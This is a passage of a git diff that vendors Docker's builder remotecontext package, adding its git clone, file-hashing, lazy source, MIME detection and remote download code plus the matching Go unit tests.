"github.com/docker/docker/builder/remotecontext" import ( + "errors" "io/ioutil" "log" "os" "sort" "testing" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/containerfs" +) + +const ( + dockerfileContents = "FROM busybox" + dockerignoreFilename = ".dockerignore" + testfileContents = "test" ) const shouldStayFilename = "should_stay" func extractFilenames(files []os.FileInfo) []string { - filenames := make([]string, len(files), len(files)) + filenames := make([]string, len(files)) for i, file := range files { filenames[i] = file.Name() @@ -43,10 +53,9 @@ func checkDirectory(t *testing.T, dir string, expectedFiles []string) { } func executeProcess(t *testing.T, contextDir string) { - modifiableCtx := &tarSumContext{root: contextDir} - ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx} + modifiableCtx := &stubRemote{root: containerfs.NewLocalContainerFS(contextDir)} - err := ctx.Process([]string{DefaultDockerfileName}) + err := removeDockerfile(modifiableCtx, builder.DefaultDockerfileName) if err != nil { t.Fatalf("Error when executing Process: %s", err) @@ -59,7 +68,7 @@ func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) { createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) executeProcess(t, contextDir) @@ -72,11 +81,11 @@ func TestProcessNoDockerignore(t *testing.T) { defer cleanup() createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) executeProcess(t, contextDir) - checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName}) + checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName}) } @@ -85,11 +94,30 @@ func TestProcessShouldLeaveAllFiles(t *testing.T) { defer cleanup() createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777) executeProcess(t, contextDir) - checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename}) + checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName, dockerignoreFilename}) } + +// TODO: remove after moving to a separate pkg +type stubRemote struct { + root containerfs.ContainerFS +} + +func (r *stubRemote) Hash(path string) (string, error) { + return "", errors.New("not implemented") +} + +func (r *stubRemote) Root() containerfs.ContainerFS { + return r.root +} +func (r *stubRemote) Close() error { + return errors.New("not implemented") +} +func (r *stubRemote) Remove(p string) error { + return r.root.Remove(r.root.Join(r.root.Path(), p)) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/filehash.go b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go new file mode 100644 index 0000000000..3565dd8279 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go @@ -0,0 +1,45 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "archive/tar" + "crypto/sha256" + "hash" + "os" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/tarsum" +) + +// NewFileHash returns new hash that is used for the builder cache keys +func NewFileHash(path, name string, fi os.FileInfo) (hash.Hash, error) { + var link string + if fi.Mode()&os.ModeSymlink != 0 { + var err error + link, err = os.Readlink(path) + if err != nil { + return nil, err + } + } + hdr, err := archive.FileInfoHeader(name, fi, link) + if err != nil { + return nil, err + } + if err := archive.ReadSecurityXattrToTarHeader(path, hdr); err != nil { + return nil, err + } + tsh := &tarsumHash{hdr: hdr, Hash: sha256.New()} + tsh.Reset() // initialize header + return tsh, nil +} + +type tarsumHash struct { + hash.Hash + hdr *tar.Header +} + +// Reset resets the Hash to its initial state. +func (tsh *tarsumHash) Reset() { + // comply with hash.Hash and reset to the state hash had before any writes + tsh.Hash.Reset() + tarsum.WriteV1Header(tsh.hdr, tsh.Hash) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/generate.go b/vendor/github.com/docker/docker/builder/remotecontext/generate.go new file mode 100644 index 0000000000..84c1b3b5ea --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/generate.go @@ -0,0 +1,3 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +//go:generate protoc --gogoslick_out=. tarsum.proto diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git.go b/vendor/github.com/docker/docker/builder/remotecontext/git.go new file mode 100644 index 0000000000..1583ca28d0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git.go @@ -0,0 +1,35 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "os" + + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext/git" + "github.com/docker/docker/pkg/archive" + "github.com/sirupsen/logrus" +) + +// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. +func MakeGitContext(gitURL string) (builder.Source, error) { + root, err := git.Clone(gitURL) + if err != nil { + return nil, err + } + + c, err := archive.Tar(root, archive.Uncompressed) + if err != nil { + return nil, err + } + + defer func() { + err := c.Close() + if err != nil { + logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while closing git context") + } + err = os.RemoveAll(root) + if err != nil { + logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while removing path and children of root") + } + }() + return FromArchive(c) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go new file mode 100644 index 0000000000..77a45beff3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go @@ -0,0 +1,204 @@ +package git // import "github.com/docker/docker/builder/remotecontext/git" + +import ( + "io/ioutil" + "net/http" + "net/url" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/urlutil" + "github.com/pkg/errors" +) + +type gitRepo struct { + remote string + ref string + subdir string +} + +// Clone clones a repository into a newly created directory which +// will be under "docker-build-git" +func Clone(remoteURL string) (string, error) { + repo, err := parseRemoteURL(remoteURL) + + if err != nil { + return "", err + } + + return cloneGitRepo(repo) +} + +func cloneGitRepo(repo gitRepo) (checkoutDir string, err error) { + fetch := fetchArgs(repo.remote, repo.ref) + + root, err := ioutil.TempDir("", "docker-build-git") + if err != nil { + return "", err + } + + defer func() { + if err != nil { + os.RemoveAll(root) + } + }() + + if out, err := gitWithinDir(root, "init"); err != nil { + return "", errors.Wrapf(err, "failed to init repo at %s: %s", root, out) + } + + // Add origin remote for compatibility with previous implementation that + // used "git clone" and also to make sure local refs are created for branches + if out, err := gitWithinDir(root, "remote", "add", "origin", repo.remote); err != nil { + return "", errors.Wrapf(err, "failed add origin repo at %s: %s", repo.remote, out) + } + + if output, err := gitWithinDir(root, fetch...); err != nil { + return "", errors.Wrapf(err, "error fetching: %s", output) + } + + checkoutDir, err = checkoutGit(root, repo.ref, repo.subdir) + if err != nil { + return "", err + } + + cmd := exec.Command("git", "submodule", "update", "--init", "--recursive", "--depth=1") + cmd.Dir = root + output, err := cmd.CombinedOutput() + if err != nil { + return "", errors.Wrapf(err, "error initializing submodules: %s", output) + } + + return checkoutDir, nil +} + +func parseRemoteURL(remoteURL string) (gitRepo, error) { + repo := gitRepo{} + + if !isGitTransport(remoteURL) { + remoteURL = "https://" + remoteURL + } + + var fragment string + if strings.HasPrefix(remoteURL, "git@") { + // git@.. is not an URL, so cannot be parsed as URL + parts := strings.SplitN(remoteURL, "#", 2) + + repo.remote = parts[0] + if len(parts) == 2 { + fragment = parts[1] + } + repo.ref, repo.subdir = getRefAndSubdir(fragment) + } else { + u, err := url.Parse(remoteURL) + if err != nil { + return repo, err + } + + repo.ref, repo.subdir = getRefAndSubdir(u.Fragment) + u.Fragment = "" + repo.remote = u.String() + } + return repo, nil +} + +func getRefAndSubdir(fragment string) (ref string, subdir string) { + refAndDir := strings.SplitN(fragment, ":", 2) + ref = "master" + if len(refAndDir[0]) != 0 { + ref = refAndDir[0] + } + if len(refAndDir) > 1 && len(refAndDir[1]) != 0 { + subdir = refAndDir[1] + } + return +} + +func fetchArgs(remoteURL string, ref string) []string { + args := []string{"fetch"} + + if supportsShallowClone(remoteURL) { + args = append(args, "--depth", "1") + } + + return append(args, "origin", ref) +} + +// Check if a given git URL supports a shallow git clone, +// i.e. it is a non-HTTP server or a smart HTTP server. +func supportsShallowClone(remoteURL string) bool { + if urlutil.IsURL(remoteURL) { + // Check if the HTTP server is smart + + // Smart servers must correctly respond to a query for the git-upload-pack service + serviceURL := remoteURL + "/info/refs?service=git-upload-pack" + + // Try a HEAD request and fallback to a Get request on error + res, err := http.Head(serviceURL) + if err != nil || res.StatusCode != http.StatusOK { + res, err = http.Get(serviceURL) + if err == nil { + res.Body.Close() + } + if err != nil || res.StatusCode != http.StatusOK { + // request failed + return false + } + } + + if res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" { + // Fallback, not a smart server + return false + } + return true + } + // Non-HTTP protocols always support shallow clones + return true +} + +func checkoutGit(root, ref, subdir string) (string, error) { + // Try checking out by ref name first. This will work on branches and sets + // .git/HEAD to the current branch name + if output, err := gitWithinDir(root, "checkout", ref); err != nil { + // If checking out by branch name fails check out the last fetched ref + if _, err2 := gitWithinDir(root, "checkout", "FETCH_HEAD"); err2 != nil { + return "", errors.Wrapf(err, "error checking out %s: %s", ref, output) + } + } + + if subdir != "" { + newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, subdir), root) + if err != nil { + return "", errors.Wrapf(err, "error setting git context, %q not within git root", subdir) + } + + fi, err := os.Stat(newCtx) + if err != nil { + return "", err + } + if !fi.IsDir() { + return "", errors.Errorf("error setting git context, not a directory: %s", newCtx) + } + root = newCtx + } + + return root, nil +} + +func gitWithinDir(dir string, args ...string) ([]byte, error) { + a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")} + return git(append(a, args...)...) +} + +func git(args ...string) ([]byte, error) { + return exec.Command("git", args...).CombinedOutput() +} + +// isGitTransport returns true if the provided str is a git transport by inspecting +// the prefix of the string for known protocols used in git. +func isGitTransport(str string) bool { + return urlutil.IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go new file mode 100644 index 0000000000..8c39679081 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils_test.go @@ -0,0 +1,278 @@ +package git // import "github.com/docker/docker/builder/remotecontext/git" + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "net/url" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + "testing" + + "github.com/google/go-cmp/cmp" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseRemoteURL(t *testing.T) { + dir, err := parseRemoteURL("git://github.com/user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("git://github.com/user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("https://github.com/user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("https://github.com/user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"https://github.com/user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("git@github.com:user/repo.git") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "master", ""}, dir, cmpGitRepoOpt)) + + dir, err = parseRemoteURL("git@github.com:user/repo.git#mybranch:mydir/mysubdir/") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(gitRepo{"git@github.com:user/repo.git", "mybranch", "mydir/mysubdir/"}, dir, cmpGitRepoOpt)) +} + +var cmpGitRepoOpt = cmp.AllowUnexported(gitRepo{}) + +func TestCloneArgsSmartHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("service") + w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q)) + }) + + args := fetchArgs(serverURL.String(), "master") + exp := []string{"fetch", "--depth", "1", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func TestCloneArgsDumbHttp(t *testing.T) { + mux := http.NewServeMux() + server := httptest.NewServer(mux) + serverURL, _ := url.Parse(server.URL) + + serverURL.Path = "/repo.git" + + mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) { + w.Header().Set("Content-Type", "text/plain") + }) + + args := fetchArgs(serverURL.String(), "master") + exp := []string{"fetch", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func TestCloneArgsGit(t *testing.T) { + args := fetchArgs("git://github.com/docker/docker", "master") + exp := []string{"fetch", "--depth", "1", "origin", "master"} + assert.Check(t, is.DeepEqual(exp, args)) +} + +func gitGetConfig(name string) string { + b, err := git([]string{"config", "--get", name}...) + if err != nil { + // since we are interested in empty or non empty string, + // we can safely ignore the err here. + return "" + } + return strings.TrimSpace(string(b)) +} + +func TestCheckoutGit(t *testing.T) { + root, err := ioutil.TempDir("", "docker-build-git-checkout") + assert.NilError(t, err) + defer os.RemoveAll(root) + + autocrlf := gitGetConfig("core.autocrlf") + if !(autocrlf == "true" || autocrlf == "false" || + autocrlf == "input" || autocrlf == "") { + t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf) + } + eol := "\n" + if autocrlf == "true" { + eol = "\r\n" + } + + gitDir := filepath.Join(root, "repo") + _, err = git("init", gitDir) + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644) + assert.NilError(t, err) + + subDir := filepath.Join(gitDir, "subdir") + assert.NilError(t, os.Mkdir(subDir, 0755)) + + err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644) + assert.NilError(t, err) + + if runtime.GOOS != "windows" { + if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil { + t.Fatal(err) + } + + if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil { + t.Fatal(err) + } + } + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "commit", "-am", "First commit") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "checkout", "-b", "test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644) + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "checkout", "master") + assert.NilError(t, err) + + // set up submodule + subrepoDir := filepath.Join(root, "subrepo") + _, err = git("init", subrepoDir) + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "config", "user.email", "test@docker.com") + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "config", "user.name", "Docker test") + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(subrepoDir, "subfile"), []byte("subcontents"), 0644) + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(subrepoDir, "commit", "-am", "Subrepo initial") + assert.NilError(t, err) + + cmd := exec.Command("git", "submodule", "add", subrepoDir, "sub") // this command doesn't work with --work-tree + cmd.Dir = gitDir + assert.NilError(t, cmd.Run()) + + _, err = gitWithinDir(gitDir, "add", "-A") + assert.NilError(t, err) + + _, err = gitWithinDir(gitDir, "commit", "-am", "With submodule") + assert.NilError(t, err) + + type singleCase struct { + frag string + exp string + fail bool + submodule bool + } + + cases := []singleCase{ + {"", "FROM scratch", false, true}, + {"master", "FROM scratch", false, true}, + {":subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false}, + {":nosubdir", "", true, false}, // missing directory error + {":Dockerfile", "", true, false}, // not a directory error + {"master:nosubdir", "", true, false}, + {"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false, false}, + {"master:../subdir", "", true, false}, + {"test", "FROM scratch" + eol + "EXPOSE 3000", false, false}, + {"test:", "FROM scratch" + eol + "EXPOSE 3000", false, false}, + {"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false, false}, + } + + if runtime.GOOS != "windows" { + // Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below + // git --work-tree .\repo --git-dir .\repo\.git add -A + // error: readlink("absolutelink"): Function not implemented + // error: unable to index file absolutelink + // fatal: adding files failed + cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false}) + } + + for _, c := range cases { + ref, subdir := getRefAndSubdir(c.frag) + r, err := cloneGitRepo(gitRepo{remote: gitDir, ref: ref, subdir: subdir}) + + if c.fail { + assert.Check(t, is.ErrorContains(err, "")) + continue + } + assert.NilError(t, err) + defer os.RemoveAll(r) + if c.submodule { + b, err := ioutil.ReadFile(filepath.Join(r, "sub/subfile")) + assert.NilError(t, err) + assert.Check(t, is.Equal("subcontents", string(b))) + } else { + _, err := os.Stat(filepath.Join(r, "sub/subfile")) + assert.Assert(t, is.ErrorContains(err, "")) + assert.Assert(t, os.IsNotExist(err)) + } + + b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile")) + assert.NilError(t, err) + assert.Check(t, is.Equal(c.exp, string(b))) + } +} + +func TestValidGitTransport(t *testing.T) { + gitUrls := []string{ + "git://github.com/docker/docker", + "git@github.com:docker/docker.git", + "git@bitbucket.org:atlassianlabs/atlassian-docker.git", + "https://github.com/docker/docker.git", + "http://github.com/docker/docker.git", + "http://github.com/docker/docker.git#branch", + "http://github.com/docker/docker.git#:dir", + } + incompleteGitUrls := []string{ + "github.com/docker/docker", + } + + for _, url := range gitUrls { + if !isGitTransport(url) { + t.Fatalf("%q should be detected as valid Git prefix", url) + } + } + + for _, url := range incompleteGitUrls { + if isGitTransport(url) { + t.Fatalf("%q should not be detected as valid Git prefix", url) + } + } +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go new file mode 100644 index 0000000000..442cecad85 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/lazycontext.go @@ -0,0 +1,102 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "encoding/hex" + "os" + "strings" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/pools" + "github.com/pkg/errors" +) + +// NewLazySource creates a new LazyContext. LazyContext defines a hashed build +// context based on a root directory. Individual files are hashed first time +// they are asked. It is not safe to call methods of LazyContext concurrently. +func NewLazySource(root containerfs.ContainerFS) (builder.Source, error) { + return &lazySource{ + root: root, + sums: make(map[string]string), + }, nil +} + +type lazySource struct { + root containerfs.ContainerFS + sums map[string]string +} + +func (c *lazySource) Root() containerfs.ContainerFS { + return c.root +} + +func (c *lazySource) Close() error { + return nil +} + +func (c *lazySource) Hash(path string) (string, error) { + cleanPath, fullPath, err := normalize(path, c.root) + if err != nil { + return "", err + } + + relPath, err := Rel(c.root, fullPath) + if err != nil { + return "", errors.WithStack(convertPathError(err, cleanPath)) + } + + fi, err := os.Lstat(fullPath) + if err != nil { + // Backwards compatibility: a missing file returns a path as hash. + // This is reached in the case of a broken symlink. + return relPath, nil + } + + sum, ok := c.sums[relPath] + if !ok { + sum, err = c.prepareHash(relPath, fi) + if err != nil { + return "", err + } + } + + return sum, nil +} + +func (c *lazySource) prepareHash(relPath string, fi os.FileInfo) (string, error) { + p := c.root.Join(c.root.Path(), relPath) + h, err := NewFileHash(p, relPath, fi) + if err != nil { + return "", errors.Wrapf(err, "failed to create hash for %s", relPath) + } + if fi.Mode().IsRegular() && fi.Size() > 0 { + f, err := c.root.Open(p) + if err != nil { + return "", errors.Wrapf(err, "failed to open %s", relPath) + } + defer f.Close() + if _, err := pools.Copy(h, f); err != nil { + return "", errors.Wrapf(err, "failed to copy file data for %s", relPath) + } + } + sum := hex.EncodeToString(h.Sum(nil)) + c.sums[relPath] = sum + return sum, nil +} + +// Rel makes a path relative to base path. Same as `filepath.Rel` but can also +// handle UUID paths in windows. +func Rel(basepath containerfs.ContainerFS, targpath string) (string, error) { + // filepath.Rel can't handle UUID paths in windows + if basepath.OS() == "windows" { + pfx := basepath.Path() + `\` + if strings.HasPrefix(targpath, pfx) { + p := strings.TrimPrefix(targpath, pfx) + if p == "" { + p = "." + } + return p, nil + } + } + return basepath.Rel(basepath.Path(), targpath) +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go similarity index 63% rename from vendor/github.com/docker/docker/pkg/httputils/mimetype.go rename to vendor/github.com/docker/docker/builder/remotecontext/mimetype.go index d5cf34e4f2..e8a6210e9c 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/mimetype.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype.go @@ -1,30 +1,27 @@ -package httputils +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "mime" "net/http" ) -// MimeTypes stores the MIME content type. -var MimeTypes = struct { +// mimeTypes stores the MIME content type. +var mimeTypes = struct { TextPlain string - Tar string OctetStream string -}{"text/plain", "application/tar", "application/octet-stream"} +}{"text/plain", "application/octet-stream"} -// DetectContentType returns a best guess representation of the MIME +// detectContentType returns a best guess representation of the MIME // content type for the bytes at c. The value detected by // http.DetectContentType is guaranteed not be nil, defaulting to // application/octet-stream when a better guess cannot be made. The // result of this detection is then run through mime.ParseMediaType() // which separates the actual MIME string from any parameters. -func DetectContentType(c []byte) (string, map[string]string, error) { - +func detectContentType(c []byte) (string, map[string]string, error) { ct := http.DetectContentType(c) contentType, args, err := mime.ParseMediaType(ct) if err != nil { return "", nil, err } - return contentType, args, nil } diff --git a/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go new file mode 100644 index 0000000000..df9c378770 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/mimetype_test.go @@ -0,0 +1,16 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDetectContentType(t *testing.T) { + input := []byte("That is just a plain text") + + contentType, _, err := detectContentType(input) + assert.NilError(t, err) + assert.Check(t, is.Equal("text/plain", contentType)) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/remote.go b/vendor/github.com/docker/docker/builder/remotecontext/remote.go new file mode 100644 index 0000000000..1fb80549b8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/remote.go @@ -0,0 +1,127 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "net/url" + "regexp" + + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/ioutils" + "github.com/pkg/errors" +) + +// When downloading remote contexts, limit the amount (in bytes) +// to be read from the response body in order to detect its Content-Type +const maxPreambleLength = 100 + +const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` + +var mimeRe = regexp.MustCompile(acceptableRemoteMIME) + +// downloadRemote context from a url and returns it, along with the parsed content type +func downloadRemote(remoteURL string) (string, io.ReadCloser, error) { + response, err := GetWithStatusError(remoteURL) + if err != nil { + return "", nil, errors.Wrapf(err, "error downloading remote context %s", remoteURL) + } + + contentType, contextReader, err := inspectResponse( + response.Header.Get("Content-Type"), + response.Body, + response.ContentLength) + if err != nil { + response.Body.Close() + return "", nil, errors.Wrapf(err, "error detecting content type for remote %s", remoteURL) + } + + return contentType, ioutils.NewReadCloserWrapper(contextReader, response.Body.Close), nil +} + +// GetWithStatusError does an http.Get() and returns an error if the +// status code is 4xx or 5xx. +func GetWithStatusError(address string) (resp *http.Response, err error) { + if resp, err = http.Get(address); err != nil { + if uerr, ok := err.(*url.Error); ok { + if derr, ok := uerr.Err.(*net.DNSError); ok && !derr.IsTimeout { + return nil, errdefs.NotFound(err) + } + } + return nil, errdefs.System(err) + } + if resp.StatusCode < 400 { + return resp, nil + } + msg := fmt.Sprintf("failed to GET %s with status %s", address, resp.Status) + body, err := ioutil.ReadAll(resp.Body) + resp.Body.Close() + if err != nil { + return nil, errdefs.System(errors.New(msg + ": error reading body")) + } + + msg += ": " + string(bytes.TrimSpace(body)) + switch resp.StatusCode { + case http.StatusNotFound: + return nil, errdefs.NotFound(errors.New(msg)) + case http.StatusBadRequest: + return nil, errdefs.InvalidParameter(errors.New(msg)) + case http.StatusUnauthorized: + return nil, errdefs.Unauthorized(errors.New(msg)) + case http.StatusForbidden: + return nil, errdefs.Forbidden(errors.New(msg)) + } + return nil, errdefs.Unknown(errors.New(msg)) +} + +// inspectResponse looks into the http response data at r to determine whether its +// content-type is on the list of acceptable content types for remote build contexts. +// This function returns: +// - a string representation of the detected content-type +// - an io.Reader for the response body +// - an error value which will be non-nil either when something goes wrong while +// reading bytes from r or when the detected content-type is not acceptable. +func inspectResponse(ct string, r io.Reader, clen int64) (string, io.Reader, error) { + plen := clen + if plen <= 0 || plen > maxPreambleLength { + plen = maxPreambleLength + } + + preamble := make([]byte, plen) + rlen, err := r.Read(preamble) + if rlen == 0 { + return ct, r, errors.New("empty response") + } + if err != nil && err != io.EOF { + return ct, r, err + } + + preambleR := bytes.NewReader(preamble[:rlen]) + bodyReader := io.MultiReader(preambleR, r) + // Some web servers will use application/octet-stream as the default + // content type for files without an extension (e.g. 'Dockerfile') + // so if we receive this value we better check for text content + contentType := ct + if len(ct) == 0 || ct == mimeTypes.OctetStream { + contentType, _, err = detectContentType(preamble) + if err != nil { + return contentType, bodyReader, err + } + } + + contentType = selectAcceptableMIME(contentType) + var cterr error + if len(contentType) == 0 { + cterr = fmt.Errorf("unsupported Content-Type %q", ct) + contentType = ct + } + + return contentType, bodyReader, cterr +} + +func selectAcceptableMIME(ct string) string { + return mimeRe.FindString(ct) +} diff --git a/vendor/github.com/docker/docker/builder/remote_test.go b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go similarity index 62% rename from vendor/github.com/docker/docker/builder/remote_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/remote_test.go index 691a084761..a0101f7493 100644 --- a/vendor/github.com/docker/docker/builder/remote_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/remote_test.go @@ -1,4 +1,4 @@ -package builder +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "bytes" @@ -9,8 +9,10 @@ import ( "net/url" "testing" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/builder" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) var binaryContext = []byte{0xFD, 0x37, 0x7A, 0x58, 0x5A, 0x00} //xz magic @@ -53,7 +55,7 @@ func TestInspectEmptyResponse(t *testing.T) { br := ioutil.NopCloser(bytes.NewReader([]byte(""))) contentType, bReader, err := inspectResponse(ct, br, 0) if err == nil { - t.Fatalf("Should have generated an error for an empty response") + t.Fatal("Should have generated an error for an empty response") } if contentType != "application/octet-stream" { t.Fatalf("Content type should be 'application/octet-stream' but is %q", contentType) @@ -151,63 +153,90 @@ func TestInspectResponseEmptyContentType(t *testing.T) { } } -func TestMakeRemoteContext(t *testing.T) { - contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") - defer cleanup() +func TestUnknownContentLength(t *testing.T) { + content := []byte(dockerfileContents) + ct := "text/plain" + br := ioutil.NopCloser(bytes.NewReader(content)) + contentType, bReader, err := inspectResponse(ct, br, -1) + if err != nil { + t.Fatal(err) + } + if contentType != "text/plain" { + t.Fatalf("Content type should be 'text/plain' but is %q", contentType) + } + body, err := ioutil.ReadAll(bReader) + if err != nil { + t.Fatal(err) + } + if string(body) != dockerfileContents { + t.Fatalf("Corrupted response body %s", body) + } +} - createTestTempFile(t, 